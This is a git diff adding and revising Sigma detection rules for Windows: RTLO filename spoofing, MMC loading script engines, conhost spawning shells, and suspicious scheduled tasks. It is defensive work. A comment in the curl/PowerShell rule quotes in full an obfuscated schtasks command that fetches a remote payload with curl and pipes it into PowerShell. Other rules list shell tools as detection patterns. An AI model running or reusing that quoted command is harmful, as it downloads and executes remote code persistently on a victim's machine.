diff --git a/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml b/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml index abf9f22ac..b129b5936 100644 --- a/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml +++ b/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml @@ -9,8 +9,11 @@ description: | references: - https://redcanary.com/blog/right-to-left-override/ - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method -author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems) + - https://tria.ge/241015-l98snsyeje/behavioral2 + - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf +author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) date: 2024-11-17 +modified: 2025-02-06 tags: - attack.execution - attack.defense-evasion @@ -20,14 +23,30 @@ logsource: product: windows detection: selection_rtlo_unicode: - TargetFilename|contains: '\u202e' + TargetFilename|contains: + - '\u202e' # Unicode RTLO character + - '[U+202E]' selection_extensions: TargetFilename|contains: - - 'fpd..' - - 'nls..' - - 'vsc..' - - 'xcod.' - - 'xslx.' + - '3pm.' # Reversed `.mp3` + - '4pm.' # Reversed `.mp4` + - 'cod.' # Reversed `.doc` + - 'fdp.' # Reversed `.pdf` + - 'ftr.' # Reversed `.rtf` + - 'gepj.' # Reversed `.jpeg` + - 'gnp.' # Reversed `.png` + - 'gpj.' # Reversed `.jpg` + - 'ism.' # Reversed `.msi` + - 'lmth.' # Reversed `.html` + - 'nls.' # Reversed `.sln` + - 'piz.' # Reversed `.zip` + - 'slx.' # Reversed `.xls` + - 'tdo.' # Reversed `.odt` + - 'vsc.' # Reversed `.csv` + - 'vwm.' # Reversed `.wmv` + - 'xcod.' # Reversed `.docx` + - 'xslx.' # Reversed `.xlsx` + - 'xtpp.' # Reversed `.pptx` condition: all of selection_* falsepositives: - Filenames that contains scriptures such as arabic or hebrew might make use of this character diff --git a/rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml b/rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml new file mode 100644 index 000000000..a75549c00 --- /dev/null +++ b/rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml @@ -0,0 +1,30 @@ +title: MMC Loading Script Engines DLLs +id: a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad +status: experimental +description: | + Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt + to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion. +references: + - https://tria.ge/241015-l98snsyeje/behavioral2 + - https://www.elastic.co/security-labs/grimresource +author: Swachchhanda Shrawan Poudel (Nextron Systems) +date: 2025-02-05 +tags: + - attack.execution + - attack.defense-evasion + - attack.t1059.005 + - attack.t1218.014 +logsource: + category: image_load + product: windows +detection: + selection: + Image|endswith: '\mmc.exe' + ImageLoaded|endswith: + - '\vbscript.dll' + - '\jscript.dll' + - '\jscript9.dll' + condition: selection +falsepositives: + - Legitimate MMC operations or extensions loading these libraries +level: medium diff --git a/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml b/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml index c144c3926..6d5449f66 100644 --- a/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml +++ b/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml @@ -1,5 +1,8 @@ title: Uncommon Child Process Of Conhost.EXE id: 7dc2dedd-7603-461a-bc13-15803d132355 +related: + - id: dfa03a09-8b92-4d83-8e74-f72839b1c407 + type: similar status: test description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. references: diff --git a/rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml b/rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml new file mode 100644 index 000000000..5a303294e --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml @@ -0,0 +1,44 @@ +title: Potentially Suspicious Child Processes Spawned by ConHost +id: dfa03a09-8b92-4d83-8e74-f72839b1c407 +related: + - id: 7dc2dedd-7603-461a-bc13-15803d132355 + type: similar +status: experimental +description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components. +references: + - https://tria.ge/241015-l98snsyeje/behavioral2 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +date: 2025-02-05 +tags: + - attack.t1202 + - attack.defense-evasion + - attack.t1218 +logsource: + category: process_creation + product: windows +detection: + selection_parent: + ParentImage|endswith: '\conhost.exe' + selection_child: + - Image|endswith: + - '\cmd.exe' # Windows Command Prompt + - '\cscript.exe' # Windows Script Host (used for scripting exploits) + - '\mshta.exe' # MSHTA (HTML Application Host, often abused) + - '\powershell_ise.exe' # PowerShell ISE + - '\powershell.exe' # Windows PowerShell + - '\pwsh.exe' # PowerShell Core + - '\regsvr32.exe' # Windows Registry Server (commonly used for exploits) + - '\wscript.exe' # Windows Script Host (for executing scripts) + - OriginalFileName: + - 'cmd.exe' + - 'cscript.exe' + - 'mshta.exe' + - 'powershell_ise.exe' + - 'powershell.exe' + - 'pwsh.dll' + - 'regsvr32.exe' + - 'wscript.exe' + condition: all of selection_* +falsepositives: + - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`. +level: high diff --git a/rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml b/rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml new file mode 100644 index 000000000..588301102 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml @@ -0,0 +1,39 @@ +title: MMC Executing Files with Reversed Extensions Using RTLO Abuse +id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44 +status: experimental +description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats. +references: + - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf + - https://en.wikipedia.org/wiki/Right-to-left_override + - https://tria.ge/241015-l98snsyeje/behavioral2 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +date: 2025-02-05 +tags: + - attack.execution + - attack.t1204.002 + - attack.defense-evasion + - attack.t1218.014 + - attack.t1036.002 +logsource: + category: process_creation + product: windows +detection: + selection_image: + - Image|endswith: '\mmc.exe' + - OriginalFileName: 'MMC.exe' + selection_commandline: + CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file + - 'cod.msc' # Reversed `.doc` + - 'fdp.msc' # Reversed `.pdf` + - 'ftr.msc' # Reversed `.rtf` + - 'lmth.msc' # Reversed `.html` + - 'slx.msc' # Reversed `.xls` + - 'tdo.msc' # Reversed `.odt` + - 'xcod.msc' # Reversed `.docx` + - 'xslx.msc' # Reversed `.xlsx` + - 'xtpp.msc' # Reversed `.pptx` + condition: all of selection_* +falsepositives: + - Legitimate administrative actions using MMC to execute misnamed `.msc` files. + - Unconventional but non-malicious usage of RLO or reversed extensions. +level: high diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml b/rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml new file mode 100644 index 000000000..eda760755 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml @@ -0,0 +1,37 @@ +title: Scheduled Task Creation with Curl and PowerShell Execution Combo +id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8 +status: experimental +description: | + Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. + This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host. +references: + - https://tria.ge/241015-l98snsyeje/behavioral2 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +date: 2025-02-05 +tags: + - attack.persistence + - attack.t1053.005 + - attack.defense-evasion + - attack.t1218 + - attack.command-and-control + - attack.t1105 +logsource: + category: process_creation + product: windows +detection: + # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest + selection_img: + Image|endswith: '\schtasks.exe' + CommandLine|contains|windash: ' /create ' + selection_curl: + CommandLine|contains|all: + - 'curl ' + - 'http' + - '-o' + selection_powershell: + CommandLine|contains: 'powershell' + condition: all of selection_* +falsepositives: + - Legitimate use of schtasks for administrative purposes. + - Automation scripts combining curl and PowerShell in controlled environments. +level: medium diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml b/rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml new file mode 100644 index 000000000..2723c7d59 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml @@ -0,0 +1,45 @@ +title: Scheduled Task Creation Masquerading as System Processes +id: 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab +status: experimental +description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence. +references: + - https://tria.ge/241015-l98snsyeje/behavioral2 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +date: 2025-02-05 +tags: + - attack.persistence + - attack.t1053.005 + - attack.defense-evasion + - attack.t1036.004 + - attack.t1036.005 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: '\schtasks.exe' + - OriginalFileName: 'schtasks.exe' + selection_cli: + CommandLine|contains|windash: ' /create ' + CommandLine|contains: + - ' audiodg' + - ' conhost' + - ' dwm.exe' + - ' explorer' + - ' lsass' + - ' lsm' + - ' mmc' + - ' msiexec' + - ' regsvr32' + - ' rundll32' + - ' services' + - ' spoolsv' + - ' svchost' + - ' taskeng' + - ' taskhost' + - ' wininit' + - ' winlogon' + condition: all of selection_* +falsepositives: + - Legitimate system administration tasks scheduling trusted system processes. +level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml b/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml index e6c3841b5..ca0089eb6 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml @@ -13,8 +13,10 @@ references: - https://redcanary.com/blog/right-to-left-override/ - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method - https://unicode-explorer.com/c/202E -author: Micah Babinski, @micahbabinski + - https://tria.ge/241015-l98snsyeje/behavioral2 +author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems) date: 2023-02-15 +modified: 2025-02-06 tags: - attack.defense-evasion - attack.t1036.002 @@ -23,7 +25,9 @@ logsource: product: windows detection: selection: - CommandLine|contains: "\u202e" + CommandLine|contains: + - '\u202e' # Unicode RTLO character + - '[U+202E]' condition: selection falsepositives: - Commandlines that contains scriptures such as arabic or hebrew might make use of this character